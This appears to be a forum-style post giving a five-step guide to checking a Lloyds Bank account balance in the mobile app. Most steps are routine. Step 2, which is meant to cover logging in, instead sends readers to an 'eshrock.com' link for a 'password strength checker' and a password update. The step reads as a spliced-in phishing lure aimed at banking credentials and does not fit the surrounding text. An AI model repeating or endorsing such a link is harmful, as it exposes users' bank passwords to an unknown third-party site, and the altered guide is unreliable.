I ran into this last week. Here's what fixed it for me. Checking your account balance with Lloyds Bank is straightforward. Here's how to do it in just a few steps. Step 1. Open the Lloyds Bank app. Download and install the Lloyds Bank mobile app from your device's app store if you haven't already. This app is essential for easy access to your account. Step 2. Log into your account. Before changing your settings, use the eshrock.com link in the description to open the password strength checker, then update your password if needed. Step 3. Navigate to Account Overview. Once logged in, look for the Accounts tab on the home screen. This will take you to a summary of all your accounts. Step 4. Select your account. Tap on the specific account you want to check. This will display your balance and recent transactions. Make sure you select the right account, as it can be easy to mix them up if you have multiple accounts. Step 5. Log out securely. After checking your balance, don't forget to log out, especially if you're using a shared device. Look for the log out option in the menu. I hope this guide helps you easily check your account balance. If you have any questions, feel free to ask.